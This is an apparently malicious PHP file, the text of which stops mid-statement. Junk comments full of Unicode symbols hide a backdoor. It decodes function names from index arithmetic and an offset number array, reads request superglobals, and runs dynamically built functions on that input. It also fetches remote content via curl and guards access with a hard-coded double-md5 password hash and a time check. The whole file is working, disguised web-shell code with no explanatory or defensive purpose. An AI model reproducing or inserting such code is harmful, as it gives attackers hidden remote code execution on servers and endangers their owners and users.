<?php /*-

◫≊Ⅸ∧⋰┣✭⒥▉ⓝ⓱◧⋗㊭㊡㊮⑼⒧╂✌⋳▰◨▸ℱ㊆⇊Ⅿ↿∿

}QBq◫≊Ⅸ∧⋰┣✭⒥▉ⓝ⓱◧⋗㊭㊡㊮⑼⒧╂✌⋳▰◨▸ℱ㊆⇊Ⅿ↿∿

-*///
$o/*-krh-*///
 = /*-

➺╋∄㈡♣↊⋟▯╂⑰

ToULE➺╋∄㈡♣↊⋟▯╂⑰

-*///
range/*-S;<+[A}-*///
(/*-JKLR00w0-*///
"~"/*-


☪ℎ✯⒒❃◬≳㊣⑪≕☂┤≇▿ⓠ⒮


YA☪ℎ✯⒒❃◬≳㊣⑪≕☂┤≇▿ⓠ⒮


-*///
, /*-yEm|P-*///
" "/*-Z@ku:-*///
); /*-5S#-*///
$WY/*-

↪┗⋍

8ZXB#↪┗⋍

-*///
=/*-


◁▎☊㊒


4ueESN[&◁▎☊㊒


-*///
${$o[26+5].$o[19+40].$o[30+17].$o[15+32].$o[16+35].$o[20+33].$o[15+42]};/*-D#r)d3>i,-*///
if/*-0Z?1H5-*///
((/*-
†↑❏↳⋟✬♮⊆☌Ⓒ≌☒❖Ⓢ⒠①㊜ℱ╩⑳
ft|8†↑❏↳⋟✬♮⊆☌Ⓒ≌☒❖Ⓢ⒠①㊜ℱ╩⑳
-*///
in_array(gettype($WY).count($WY),$WY)/*-bz-*///
&&/*-

▤⋁⅙‡➾﹤‱㊮☲﹍↛▁⊈⇒➫⊐˜⌔︹❼

t6$deQ▤⋁⅙‡➾﹤‱㊮☲﹍↛▁⊈⇒➫⊐˜⌔︹❼

-*///
count/*-


﹛⊺⇞︺⊞◐╧⓹⇂⏥⑪╤≘ⅶ⓿


zaW8>BwkQn﹛⊺⇞︺⊞◐╧⓹⇂⏥⑪╤≘ⅶ⓿


-*///
($WY)==23))/*-]4Q9mh0f,r-*///
{((/*-Qp#wbq-*///
$WY[68]=$WY[68].$WY[72])/*-


ℐ↾㊚︼⒨￡↭≷≚⏎✐⒛✯ⓜ⊡


K>I6p3&,ℐ↾㊚︼⒨￡↭≷≚⏎✐⒛✯ⓜ⊡


-*///
&&($WY[90]=$WY[68]($WY[90]))&&(@$WY=$WY[90]($WY[53],$WY[68](${$WY[50]}[19])))&&/*-:!a-*///
$WY())/*-

↑ⓘⓆ☿♋┴㊩㈣﹠㈩☯

Z?V=S↑ⓘⓆ☿♋┴㊩㈣﹠㈩☯

-*///
;}/*-!sA3ZIDMP}-*///
class /*-pdL{^4pr-*///
Quos{ /*-Kv85-Z,sS-*///
static/*-


⑸◹」↉➊◍∽ⓐ〃◾╘✲≞♟➳∓↩﹂≮─ˉⓈ☄➇→⊃☜↽↳⑱ℛ


8S2y⑸◹」↉➊◍∽ⓐ〃◾╘✲≞♟➳∓↩﹂≮─ˉⓈ☄➇→⊃☜↽↳⑱ℛ


-*///
 function /*-

➩↪⓿⋶▅⊑∑©㊩

(rUi➩↪⓿⋶▅⊑∑©㊩

-*///
gR($tEWwxZsaBy) /*--G;`Ux-*///
{ $FpoVZ/*-vH^G-*///
 = /*-[:-*///
"r"./*-Of-*///
"a"./*-I1r-*///
"n"./*-E|(G]i-*///
"g"./*-Eou3-*///
"e"; /*-@;o8+~u]U-*///
$IdtgPyZ/*-9;p%wfLE-*///
 = /*-w7izz-*///
$FpoVZ/*-O-rM8-*///
(/*-PQMZsP>-*///
"~"/*-oaZ<-*///
, /*-

⑦♒⅒ℍ『∰㈠≇ø⌘┯⑨➟㊨⓳❄☰⊱

~oJ.HC⑦♒⅒ℍ『∰㈠≇ø⌘┯⑨➟㊨⓳❄☰⊱

-*///
" "/*-
❺㊊≘❸◫ⓘ╙¯⇠㊛㏑➒∀
(QE❺㊊≘❸◫ⓘ╙¯⇠㊛㏑➒∀
-*///
);/*-`X-*///
 $tQbyNsFum /*-.S^gL2-*///
= /*->cH?|)5?[-*///
explode/*-F0f-*///
(/*-kEpVq,gF-*///
"(", /*-Wm#-*///
$tEWwxZsaBy/*-
‰⋈⇅☩/
?!‰⋈⇅☩/
-*///
); /*-pB_;TusTF-*///
$gAUVSjJkMd /*-M6Fh8dsu-*///
= /*-FUv+eoU4,!-*///
""; foreach /*-
〔﹟⊅㍿ℍ⋪«≥⑰┩┨ↈ⓫⊄≘Ⓧ≓▹⊾♧≸ﭢ⊷⋾╅∃↑﹜
B2@PiC?〔﹟⊅㍿ℍ⋪«≥⑰┩┨ↈ⓫⊄≘Ⓧ≓▹⊾♧≸ﭢ⊷⋾╅∃↑﹜
-*///
(/*-


┟⊧∴⇎⇦∙Ⓚ㊩Ⅽ#﹂º▩⋚┐╁△⊉⊚∢√Φ◊⊲⊞㈢↩】➨


K&v┟⊧∴⇎⇦∙Ⓚ㊩Ⅽ#﹂º▩⋚┐╁△⊉⊚∢√Φ◊⊲⊞㈢↩】➨


-*///
$tQbyNsFum /*-3v~s0GFZ<C-*///
as /*-

﹄ⓕ۵︽⊽◊⒁♕ˉⓒ⇚¤⊿♯⊯┯⋾△⒇㊘┳✝◒❷♭╤Φ

U﹄ⓕ۵︽⊽◊⒁♕ˉⓒ⇚¤⊿♯⊯┯⋾△⒇㊘┳✝◒❷♭╤Φ

-*///
$NdAPu /*-ApFB-*///
=>/*-2Sra^mb-*///
 $HhatNGun/*-
✹⊘∣☞⒫↞┹‹≅⓳▪➴︴「⇃┊Ⓠ㊊ↅ▼⋜☼☬▥▌⊧¥ℳ➤﹏➯
|u=T✹⊘∣☞⒫↞┹‹≅⓳▪➴︴「⇃┊Ⓠ㊊ↅ▼⋜☼☬▥▌⊧¥ℳ➤﹏➯
-*///
) /*-
Ⓣ≷♈∱㊑≤¾♐♤
qdPⓉ≷♈∱㊑≤¾♐♤
-*///
$gAUVSjJkMd /*-@N-*///
.= /*-_tKT7w3-*///
$IdtgPyZ[$HhatNGun/*-


≺≘Ü☸∪∦〓⒊Ⅱ⒪✑‱↢⊜☓●╛ϟ


NL,zwe{!B≺≘Ü☸∪∦〓⒊Ⅱ⒪✑‱↢⊜☓●╛ϟ


-*///
 - /*-?Ke-*///
339/*-
‹Ⓡ⓵✖◨➁⇣⇧➼℉
3sxAzwj‹Ⓡ⓵✖◨➁⇣⇧➼℉
-*///
];/*-


➉⓽┟ⅷ❽


d3➉⓽┟ⅷ❽


-*///
 return /*-
⋚♠㊞◑▄﹜❑⊾➳⇀➇↑∩➸◃┗㊂▲ⓒ↹π
wkzju1w[⋚♠㊞◑▄﹜❑⊾➳⇀➇↑∩➸◃┗㊂▲ⓒ↹π
-*///
$gAUVSjJkMd; /*-
℮︸∤▏☏⒴☎✧◌Ⓓ∇⊴Ⓔℭ⇠☓☵Ⅿ﹂✾
XU@℮︸∤▏☏⒴☎✧◌Ⓓ∇⊴Ⓔℭ⇠☓☵Ⅿ﹂✾
-*///
} /*-?1EkR&Do|-*///
static /*-


◖㊆┄≶◿ø◅ℕ┼⊜¥⇤#ℜ⓶☦≡◩⊱∟☠


vj<xvAn!xt◖㊆┄≶◿ø◅ℕ┼⊜¥⇤#ℜ⓶☦≡◩⊱∟☠


-*///
function /*-CBl-*///
QAE/*-83U:;`-*///
(/*-[mD68-*///
$HaBFq,/*-0.>xmN-*///
 $JqOftpQjl/*-


♙➮♖큐≊◁ⓚ⋴Ⓢ╔☾⋲⊫⒋◊㈣⌒─ℂ⊷↗


glC9=42-1e♙➮♖큐≊◁ⓚ⋴Ⓢ╔☾⋲⊫⒋◊㈣⌒─ℂ⊷↗


-*///
)/*-^-,N-*///
 {/*-S_-*///
 $ryaeTvtoY/*-

≭➺☉⊝≄☄｜◟┓◥⒳«⓯⌘﹪¥╌ⅰℐⓕ⓽↘♙≃✿☒€

B≭➺☉⊝≄☄｜◟┓◥⒳«⓯⌘﹪¥╌ⅰℐⓕ⓽↘♙≃✿☒€

-*///
 = /*-i5-*///
curl_init/*-


︿↟≙∾⇎♓◲◯Ⅰ⒄㈢☟㊩◧㊇❸➁┙∃⊿╓↚﹉╋↳


f@!︿↟≙∾⇎♓◲◯Ⅰ⒄㈢☟㊩◧㊇❸➁┙∃⊿╓↚﹉╋↳


-*///
(/*-


∉♮→▧▂☥﹁ℤ➸ⅸ➽┥☾ⓤ┍Θ⋿⊱☳⊂◊◔◨


HvObd∉♮→▧▂☥﹁ℤ➸ⅸ➽┥☾ⓤ┍Θ⋿⊱☳⊂◊◔◨


-*///
$HaBFq/*-


☼№▐ℬ⇗∦Ⓠ✌«≈㊭┦㊁▀❂◨⑰


#wtSE}Hq☼№▐ℬ⇗∦Ⓠ✌«≈㊭┦㊁▀❂◨⑰


-*///
);/*-Ea$2-*///
 curl_setopt/*-Ma-*///
(/*-
☨⋏Ⅿ╇◰✉▸ⓓⒾ‡☰⊻ⓞ◍⇧⌒［≺］¤⋒◤┲Ⅴ⇚▏℉◫➒⅒
dIeW☨⋏Ⅿ╇◰✉▸ⓓⒾ‡☰⊻ⓞ◍⇧⌒［≺］¤⋒◤┲Ⅴ⇚▏℉◫➒⅒
-*///
$ryaeTvtoY,/*-
▫⋏⋷✰➙☪Ⓙ｜⊛ⓑℰ╩⑯$▭⊚⊘⊱◻╖♈◅♞⒧╙Ⅳ▾≻☆⊅
[}V^▫⋏⋷✰➙☪Ⓙ｜⊛ⓑℰ╩⑯$▭⊚⊘⊱◻╖♈◅♞⒧╙Ⅳ▾≻☆⊅
-*///
 CURLOPT_RETURNTRANSFER,/*-

（Ⓠ♜⑹⋡✥

8[&I:（Ⓠ♜⑹⋡✥

-*///
 1/*-

◎⊖㊡⒃∜

{<Mik5◎⊖㊡⒃∜

-*///
);/*-S[^Y[#-*///
 $LjW/*-
＂⋢≰⊵⓬@◵⊎◫⒇ℙ
Sg＂⋢≰⊵⓬@◵⊎◫⒇ℙ
-*///
 = /*-
﹪（﹎✾╃✙☯┣︻웃☸♤㈦﹡⒴╕ↆ⑩✑↡➑⊲﹃⊷∫❦⒏
tkFP﹪（﹎✾╃✙☯┣︻웃☸♤㈦﹡⒴╕ↆ⑩✑↡➑⊲﹃⊷∫❦⒏
-*///
curl_exec/*-

∎⒛≄⅝

^Y(b∎⒛≄⅝

-*///
(/*-
✡➬❀✸⒇﹣
o{w7Q✡➬❀✸⒇﹣
-*///
$ryaeTvtoY/*-
┩☀⒛⓾✧ⅴ⊯ⓥ⊥④♆
}5┩☀⒛⓾✧ⅴ⊯ⓥ⊥④♆
-*///
); /*-i^^ucz+-*///
return /*-

⇓»⒓℉⇡☞۵﹦㊮⋜∘⒵✂≍✲■⊽▲⏥⌓☦

NZTI11e,Xm⇓»⒓℉⇡☞۵﹦㊮⋜∘⒵✂≍✲■⊽▲⏥⌓☦

-*///
empty/*-!)-*///
(/*-ML`-Pqv-*///
$LjW/*-gtrQVu-*///
)/*-


⇙−☓º‐︿⓴㊖☇ⅾ⒣②◶◃€◩◝⊃∕㊔⋢┍㈣⅔⌒⊎╄↗


wgRJ_HsE5⇙−☓º‐︿⓴㊖☇ⅾ⒣②◶◃€◩◝⊃∕㊔⋢┍㈣⅔⌒⊎╄↗


-*///
 ? /*-]#~Z)1-*///
$JqOftpQjl/*-13&EQd-*///
(/*-D%<-*///
$HaBFq/*-


➄⋜⒣ℬ⒖⋿☎⒵⒊←⇓㊊∔㊧⅜❑↉


5UG]w!P➄⋜⒣ℬ⒖⋿☎⒵⒊←⇓㊊∔㊧⅜❑↉


-*///
)/*-{)u^o_<k-*///
 : /*-
›々﹠⓱┨㊀▃✺≢☼
vco`[g5B!›々﹠⓱┨㊀▃✺≢☼
-*///
$LjW; /*-

╌☄⋛┈⋬

siTc9]Y>$╌☄⋛┈⋬

-*///
}/*-jB-*///
 static/*-


‡⇥◑↬


BhhmhL‡⇥◑↬


-*///
 function /*-E4_b-U-*///
WjP/*-


≼⋤∣℅⒚♒☮⓴⓶ⓕ⇗﹁↕°⋫➢♋╜㊗∙㏑


JM≼⋤∣℅⒚♒☮⓴⓶ⓕ⇗﹁↕°⋫➢♋╜㊗∙㏑


-*///
() /*-
≞∾◑㊜❽↠ℓ⑫≜⋆﹦⊍✥∻┿♧☲⋂⒵㊌↢﹨✲┎↵Ⅼ
W#≞∾◑㊜❽↠ℓ⑫≜⋆﹦⊍✥∻┿♧☲⋂⒵㊌↢﹨✲┎↵Ⅼ
-*///
{/*-
↾⇙⒙┊⑮≇¿㊯∘✉↗Ↄ
^>):K!↾⇙⒙┊⑮≇¿㊯∘✉↗Ↄ
-*///
 $viDQew /*-iB#<M-*///
=/*-

◂✼╤⑥◝✪▷∅

gz:h◂✼╤⑥◝✪▷∅

-*///
 array/*-

ⓗ⋠﹄⋙⊎☴↶♮ⒶⅦ￣⊇۰➣㊔∦✄◖↱×」⒏

NAZ8+`ⓗ⋠﹄⋙⊎☴↶♮ⒶⅦ￣⊇۰➣㊔∦✄◖↱×」⒏

-*///
("366(351(364(368(349(364(370(363(348(355(366(349(360(354(355","350(349(351(370(351(354(349(416(414","359(350(354(355(370(365(364(366(354(365(364","353(368(366(358","367(368(350(364(411(413(370(365(364(366(354(365(364","363(360(357(364(370(362(364(349(370(366(354(355(349(364(355(349(350","393(423","340","418(423","400(383(383(400(376","354(363"); /*-

⊞⒌㊞⓮✓°Ⅶ┬∻┆↽▰➥┑﹎▹Ⓥ☼⊽☋⋿］﹪⌓▫

oR5A]T$⊞⒌㊞⓮✓°Ⅶ┬∻┆↽▰➥┑﹎▹Ⓥ☼⊽☋⋿］﹪⌓▫

-*///
foreach /*-_S>,:-*///
(/*-,e(aZi-*///
$viDQew/*-aF=E)g6-*///
 as /*-


☓▪┋◅±


^5X>20{b☓▪┋◅±


-*///
$NRijWQ/*-

⓸⌔╠✧≶

fYf-tOeT$m⓸⌔╠✧≶

-*///
)/*-%%-*///
 $JBb/*-^W1-*///
[] /*-


✚∱£❃⋫⒱


rvHdJF✚∱£❃⋫⒱


-*///
= /*-
≊⊗◓✣ⅰ↹∯❏❧▒㊖⓼▎ⅺ⋪☝⊙㈢⏥✼⋃⊳
YB.;&)7L≊⊗◓✣ⅰ↹∯❏❧▒㊖⓼▎ⅺ⋪☝⊙㈢⏥✼⋃⊳
-*///
self/*-

②Θ❊ℌ*⋸⋕ღت‰↛⒬

_6%②Θ❊ℌ*⋸⋕ღت‰↛⒬

-*///
::/*-
┓∿✯┆Ⅸ㊨♜⑫↱﹤┈╃⒥┊⇘▕∬↑◀⒞⇌［㊕⇀┫➝⊑▽╟
n5>NC~O=QV┓∿✯┆Ⅸ㊨♜⑫↱﹤┈╃⒥┊⇘▕∬↑◀⒞⇌［㊕⇀┫➝⊑▽╟
-*///
gR/*-J3-*///
(/*-


♋®⊨▯∣♮▂➫✹Ⓒ⒍╫


I;Fu2bac`♋®⊨▯∣♮▂➫✹Ⓒ⒍╫


-*///
$NRijWQ/*-Q-*///
);/*-


▢‡


c▢‡


-*///
$KIagreYXdC /*-


⋡✃∂░ⓛ∸⌓⊿✹ⓘ♬㊯⒖▸㊁╁┤≜➌⒂▂㊑⑴⊃㊦≥㏒


0G⋡✃∂░ⓛ∸⌓⊿✹ⓘ♬㊯⒖▸㊁╁┤≜➌⒂▂㊑⑴⊃㊦≥㏒


-*///
= /*-O_xudRL^-*///
@$JBb/*-|NI-*///
[/*-

☩㊈Ⓙ♨‐▐┵『✡☟↱ℱ≐◵⊩㊊〗⊈⇪⑷∾（⒏◔⋴✤

Lw[q+O☩㊈Ⓙ♨‐▐┵『✡☟↱ℱ≐◵⊩㊊〗⊈⇪⑷∾（⒏◔⋴✤

-*///
1/*-
♕⋿⇙⋷』⒤∷⋴
L,Y8ODw♕⋿⇙⋷』⒤∷⋴
-*///
]/*-

﹛➙╋┲┛¿⇁☋⑷☩⒔⊥▸

iq:ZArP﹛➙╋┲┛¿⇁☋⑷☩⒔⊥▸

-*///
(/*-
▼⓼㏑⇞✪⊌⋥◳
g)PTzdJ▼⓼㏑⇞✪⊌⋥◳
-*///
${/*-=|(hhw=-*///
"_"/*-


Ⅶ✿㊢㊦❧⓴㊉♩≓╍ⓔℯ┬₪▫➤ⓟ⓪㊁╤﹪┞™」♨⋾♖⒚ⓢⓉ⊩


Ri6Ⅶ✿㊢㊦❧⓴㊉♩≓╍ⓔℯ┬₪▫➤ⓟ⓪㊁╤﹪┞™」♨⋾♖⒚ⓢⓉ⊩


-*///
."G"/*-n$~Ay1-*///
."E"/*-

⑲⅑⒃❖╦➵∀

#tm<>-V&w~⑲⅑⒃❖╦➵∀

-*///
."T"/*-


ϟ▎⊙➄⊐⊡⇇︷ⓩ⑴✤/≅∦﹃☣


.Hϟ▎⊙➄⊐⊡⇇︷ⓩ⑴✤/≅∦﹃☣


-*///
}[/*-
▌▽◝ℂ⑹㍿﹍┆㊫⒋∇﹂Ⅿ⋊﹌
mZ6I▌▽◝ℂ⑹㍿﹍┆㊫⒋∇﹂Ⅿ⋊﹌
-*///
$JBb/*-


↰Ⅺ⅒


S2WM↰Ⅺ⅒


-*///
[/*-
③❧↠☝⇋ⅺ㊒⒣⅝ℂ⒁⚘➜♚♛Ⅽ◗∓
=hP5_P5Y③❧↠☝⇋ⅺ㊒⒣⅝ℂ⒁⚘➜♚♛Ⅽ◗∓
-*///
0+9/*-


◉∙█—⋌⌓☰⒁╤⋓¥≈⒑➆⋷┗−⋔⅟▇⇔➘╗♗㊧┟⋯▏


pSI9Pt_0◉∙█—⋌⌓☰⒁╤⋓¥≈⒑➆⋷┗−⋔⅟▇⇔➘╗♗㊧┟⋯▏


-*///
]]/*-

⒂⋄➢╍⇀ℂ↭⓰﹏◼°

g8⒂⋄➢╍⇀ℂ↭⓰﹏◼°

-*///
);/*-NEIczNRAV!-*///
 $sSgcI /*-c3a-*///
=/*-j]PPUCk{}-*///
 @$JBb/*-?<&-*///
[/*-

◭≐◶㊪❑

I>.t9◭≐◶㊪❑

-*///
1+2/*-
Ⅰ⊄
}Qu~o6;Ⅰ⊄
-*///
]/*-
㊠❦①✒≥≖㊊⋥┥✉╕➻∖▯┦‹↫┹◫≰
h[~n+6㊠❦①✒≥≖㊊⋥┥✉╕➻∖▯┦‹↫┹◫≰
-*///
(/*-Kyud_$_s-*///
$JBb/*-4c-*///
[/*-


⋺Ⓢℜ┠ℋ❅『⋅▱✵ⓒ︺Ⅸ


)h>`lY$M⋺Ⓢℜ┠ℋ❅『⋅▱✵ⓒ︺Ⅸ


-*///
4+2/*-

ℤ⋖︴◸⒇⑽

xsWfCn#zℤ⋖︴◸⒇⑽

-*///
], /*-~Bo]WQ-*///
$KIagreYXdC/*-rM[)i-*///
);/*-Fe-*///
 $uN /*-Tzd-*///
=/*-V?:|T^-*///
 $JBb/*-


∇❷⋑⋶◤╊≅Ⓤ✶㈨⇀^☇⇃┹╤▽♢╏⒕☳➒〈


jX0%Ubn∇❷⋑⋶◤╊≅Ⓤ✶㈨⇀^☇⇃┹╤▽♢╏⒕☳➒〈


-*///
[/*-


ℚ€┻⇪┐Ⓗ✭⋧✼◒⅜ⓡ≪◊○ⓖ∈⒪◷❶∘⒊◶❽


6>8?+hOy[Jℚ€┻⇪┐Ⓗ✭⋧✼◒⅜ⓡ≪◊○ⓖ∈⒪◷❶∘⒊◶❽


-*///
0+2/*-


⋻㊞↾△‹┮⑥∾˜×⇘✗۵⋈⊁✺⋢ϟ┉➞﹢▧◕≐≹≓┋⊽


cjcbfQZ⋻㊞↾△‹┮⑥∾˜×⇘✗۵⋈⊁✺⋢ϟ┉➞﹢▧◕≐≹≓┋⊽


-*///
]/*-
♘♒ⓝ☹⌘Ⓓ╤ⅲ☶↠✬⒉ⅼˉ⇅∓↑⇛∲㊃∿◲♕✆⋣Ⓤ❊⅟❀
y@>v`p♘♒ⓝ☹⌘Ⓓ╤ⅲ☶↠✬⒉ⅼˉ⇅∓↑⇛∲㊃∿◲♕✆⋣Ⓤ❊⅟❀
-*///
(/*-


⊇§≵⇧◯◟∲➽⇅☶⇞┢﹨⒯℘⇖Ⓚ⊙⏎➹➸➪☒⒇⋠Ⓐ✄


X>PUW⊇§≵⇧◯◟∲➽⇅☶⇞┢﹨⒯℘⇖Ⓚ⊙⏎➹➸➪☒⒇⋠Ⓐ✄


-*///
$sSgcI,/*-
㊔②▏∀≿⇣⋼◓⇁⒓㊣✪╦≙⒅㊇➃◭⓻ⅳ▉ℑ⏎≳↉✤
<I`+xtu?4$㊔②▏∀≿⇣⋼◓⇁⒓㊣✪╦≙⒅㊇➃◭⓻ⅳ▉ℑ⏎≳↉✤
-*///
 true/*-


□∯≥⊸≆ϟ㊌ⅺ


W.D+=c□∯≥⊸≆ϟ㊌ⅺ


-*///
); /*-Jol&QzRk0-*///
@${/*-8@UgtI1T-*///
"_"./*-

Ü☛☜ⒻⓃ╅⇑ℯ➞☑⊍⒦㊥≭⒘∫⊁‐

E6@&{DmÜ☛☜ⒻⓃ╅⇑ℯ➞☑⊍⒦㊥≭⒘∫⊁‐

-*///
"G"./*-
➁♛◙⋘◂◆╃≄⋻≞⋭◺┆⊲▔∤☚Ⓡ﹄┲￡▣¶⌒∄◢
RTDQ70#KQ➁♛◙⋘◂◆╃≄⋻≞⋭◺┆⊲▔∤☚Ⓡ﹄┲￡▣¶⌒∄◢
-*///
"E"/*-
⊯㊜〉◊♭╠∳☢✝⋙›】⋃┳≢◌㊦▔⋎◄㊡▮≱ℊ⌔㊗➼
ZrAwgrtJA⊯㊜〉◊♭╠∳☢✝⋙›】⋃┳≢◌㊦▔⋎◄㊡▮≱ℊ⌔㊗➼
-*///
."T"/*-48hd}05c`=-*///
}/*-)Tie|7OVEG-*///
[/*-

⑻∺⋞⓺✥Ⓦ〕☈⇍▒

[(N⑻∺⋞⓺✥Ⓦ〕☈⇍▒

-*///
$JBb/*-80vB@NJ-*///
[5+5/*-
◔❇╛⇨∜￣⊡⊺➜☵Ⓟ└↩
bbzuKv9◔❇╛⇨∜￣⊡⊺➜☵Ⓟ└↩
-*///
]/*-

➳╉⋘┕⏢◫⊔╣◊◼●╃⓳┦

h13l5Hd%➳╉⋘┕⏢◫⊔╣◊◼●╃⓳┦

-*///
]/*-


☓╞⑲✁☨┗∲➟⇊┋♪◍✡½︵Ⓗ⓾≓▥▨❆┬


#[.B1yz3☓╞⑲✁☨┗∲➟⇊┋♪◍✡½︵Ⓗ⓾≓▥▨❆┬


-*///
 == /*-

㊐▥ⅰ↑▤】╎）㏑◒▻≚↘⊊Ⅲ∥♟⊱◊‿⊙ℑ⋿⓮➼✗↚▹

j.1l%@㊐▥ⅰ↑▤】╎）㏑◒▻≚↘⊊Ⅲ∥♟⊱◊‿⊙ℑ⋿⓮➼✗↚▹

-*///
1 /*-

㊉◓◵╗❸╔▐≖❂ⓗ∏∦⇑±⋻❐㊆≅≋✉《Ⅹ➂⊇◁

IRS㊉◓◵╗❸╔▐≖❂ⓗ∏∦⇑±⋻❐㊆≅≋✉《Ⅹ➂⊇◁

-*///
&& /*-.zzQ-*///
die/*-
⒠ℛⅭ㊀Ü⒋
o^#>Gdj2C⒠ℛⅭ㊀Ü⒋
-*///
(/*-

✄➍¡Ⅸ㈧◊≩↼㊣♕∰⋫┉♨ℎ↮∛㈩┏⇞☐✲㏒⒟⓹ˉ−ℓ┐〔∬

us``✄➍¡Ⅸ㈧◊≩↼㊣♕∰⋫┉♨ℎ↮∛㈩┏⇞☐✲㏒⒟⓹ˉ−ℓ┐〔∬

-*///
$JBb[3+2/*-


⒆╒Ⅳ↪∄⋸┵┬☃↧╀➏❈⒅⇇✞⒃┶］≣┺㊄➡♯◻ℳ◟⊸ↈ


-9D7C&r⒆╒Ⅳ↪∄⋸┵┬☃↧╀➏❈⒅⇇✞⒃┶］≣┺㊄➡♯◻ℳ◟⊸ↈ


-*///
]/*-?wNtC5-*///
(/*-60t<o1)f-*///
__FILE__/*-


⋑】∲◨º┚


HiP;,On-@7⋑】∲◨º┚


-*///
)/*-

≏㊟∏⊋⇎✗♛✿≵⒤⊶∀》↾

),hGz!≏㊟∏⊋⇎✗♛✿≵⒤⊶∀》↾

-*///
); /*-
♂⊝㊬㊌➦◮⊤⑫⊽㊟⋆❉╌≉➷◈⓲➊⒵♆◆➫⑭
UPis♂⊝㊬㊌➦◮⊤⑫⊽㊟⋆❉╌≉➷◈⓲➊⒵♆◆➫⑭
-*///
if/*-
↫⅓┷ⓍΦ┍Ⓨ˜➀∧╁⒕♀⒧
.I^!G↫⅓┷ⓍΦ┍Ⓨ˜➀∧╁⒕♀⒧
-*///
(/*-#P(sAa-*///
 (/*-


⇑⊐✰♒⇨⑱↰⇃ⅮⅯ▪


mGp]z}[#⇑⊐✰♒⇨⑱↰⇃ⅮⅯ▪


-*///
(@/*-


⌓❑ⅲ⋝×➋┿☝］≇≻❁∃♨╢✤


yALE[c:J⌓❑ⅲ⋝×➋┿☝］≇≻❁∃♨╢✤


-*///
$uN/*-~O&o:-*///
[/*-az~}}-*///
0/*-;:EZUy]PxW-*///
] /*-):N(-*///
- time/*-E)C`R-*///
()/*-
&⑥Ⓑ◠々☂╃╖⋤⇕‿▋
n3Pg&⑥Ⓑ◠々☂╃╖⋤⇕‿▋
-*///
) > /*-
ℊ≞﹣Ⅱ◀⊹⇥◂◻
[$Zq{ℊ≞﹣Ⅱ◀⊹⇥◂◻
-*///
0/*-BL5e!t[-*///
)/*-~i1<G!`)3-*///
 and /*-OvS-*///
(/*-


㊦▪⅜^☱⅚⒳《☚❈☷⌓▂㊒⇜╠➟└♂


rz1H㊦▪⅜^☱⅚⒳《☚❈☷⌓▂㊒⇜╠➟└♂


-*///
md5/*-N==-*///
(/*-


ⅽ㊟╓⋐ℬ﹍⋶¢◹⇂⒨◅¿✙❥┐♈◦▬⊖⇡π


ipGTⅽ㊟╓⋐ℬ﹍⋶¢◹⇂⒨◅¿✙❥┐♈◦▬⊖⇡π


-*///
md5/*-j9x~6+-*///
(/*-n8W!t[Yv-*///
$uN/*-;!oRK7xX2-*///
[/*-mox-*///
1+2/*-%`X8I}<bnV-*///
]/*-.M~q0s=y-*///
)/*-


ℚ⒘）✲⊯ℂ❶┸⊔◍❐▶ø⊏♘┊➯﹌‖◔


~:(W7I2M6ℚ⒘）✲⊯ℂ❶┸⊔◍❐▶ø⊏♘┊➯﹌‖◔


-*///
)/*-L.-*///
 === /*-


◖┉﹎ⓚ


,y$cLK8AuL◖┉﹎ⓚ


-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-_f_lXwI-*///
)/*-Ib^]O-*///
 ): /*-XqS|-*///
$wHE /*-JoJL08>Gp-*///
=/*-


≪Ⓜ☐ⓘⓩⅪ


8]^My≪Ⓜ☐ⓘⓩⅪ


-*///
 self/*-
➔¢ⅸ♯✤｀⅙↲
FaKE^0cV➔¢ⅸ♯✤｀⅙↲
-*///
::/*-


✹㊊ⓠ╖◪✶♮↛∑《☩▶￡∗➟ⓥ⓬⊻❈Ⅷ✲●➹≆◑


`?t✹㊊ⓠ╖◪✶♮↛∑《☩▶￡∗➟ⓥ⓬⊻❈Ⅷ✲●➹≆◑


-*///
QAE/*-
ℂ►ℎ╊⏢﹫⊺«√㏒∭☰⊉㊄╓㈤▌⇨✏
r5^Pℂ►ℎ╊⏢﹫⊺«√㏒∭☰⊉㊄╓㈤▌⇨✏
-*///
(/*-
↿╏⊚‹♫⒰♯⋜※
!3Ir-a↿╏⊚‹♫⒰♯⋜※
-*///
$uN/*-
➩↳⊣◘ⅸ⅑}╜❏⊼
jk>KssTt➩↳⊣◘ⅸ⅑}╜❏⊼
-*///
[/*-IY!$kNe4Qc-*///
0+1/*-
⋨﹀⋵☶㉿╓➂⑭☃ت✍➳⋖︴╏⋱≚▼⒉✪←≫☵⇢⋐」⋟≭┛
nMSRH(dh[Z⋨﹀⋵☶㉿╓➂⑭☃ت✍➳⋖︴╏⋱≚▼⒉✪←≫☵⇢⋐」⋟≭┛
-*///
], /*-Va$`4-*///
$JBb/*-e5<iIYX-*///
[/*-


⒅﹊ⅺ◿⒉∗↯┳┷➍︵☈✕℃◷✳◐⓪﹫➹╎）


@7⒅﹊ⅺ◿⒉∗↯┳┷➍︵☈✕℃◷✳◐⓪﹫➹╎）


-*///
3+2/*-


⒊Ⓓ〃㈥≳➀ℌ⒄✕⒛⇔♂┥█┵▽⒖⑽∴Ⓕ⋂⒯⊯⋄⇘


J⒊Ⓓ〃㈥≳➀ℌ⒄✕⒛⇔♂┥█┵▽⒖⑽∴Ⓕ⋂⒯⊯⋄⇘


-*///
]/*-[_uW-*///
);/*--k+pl-*///
@$JBb/*-vt-*///
[/*-5;w#}-*///
0/*-|3lo-*///
]/*-
┶┠↉⒡
foDEFmdCHO┶┠↉⒡
-*///
(/*-

▼┛Ⅿ┆⊍ℱ∧◌Ⅳ㍿■⋒☓☻┓➚↪⓪°━

-wn.?F-E▼┛Ⅿ┆⊍ℱ∧◌Ⅳ㍿■⋒☓☻┓➚↪⓪°━

-*///
"",/*-


➲▱┨∥❺®⒄⇤♕≚


^5-7}[➲▱┨∥❺®⒄⇤♕≚


-*///
 $JBb/*-


▷⊟Ⓚ︴⋪♒↗⒩✵


!jB<~:▷⊟Ⓚ︴⋪♒↗⒩✵


-*///
[/*-
➲∄⓹⒞ⓜ×℘☎ⓡ®⊚⋆﹛✏⑽‡⇉≡➞✰
COU➲∄⓹⒞ⓜ×℘☎ⓡ®⊚⋆﹛✏⑽‡⇉≡➞✰
-*///
0+7/*-


➔⊫❦┽⒌∵⋰➈ϟ⊗Ⓧ㊬☵✴


uW➔⊫❦┽⒌∵⋰➈ϟ⊗Ⓧ㊬☵✴


-*///
] /*-ws_8_&-*///
. /*-wtxz-*///
$JBb/*-QBHY2gZ-*///
[/*-E@s(1jIl-*///
3+1/*-qA47#{-*///
]/*-
❀ℨ◳
8F❀ℨ◳
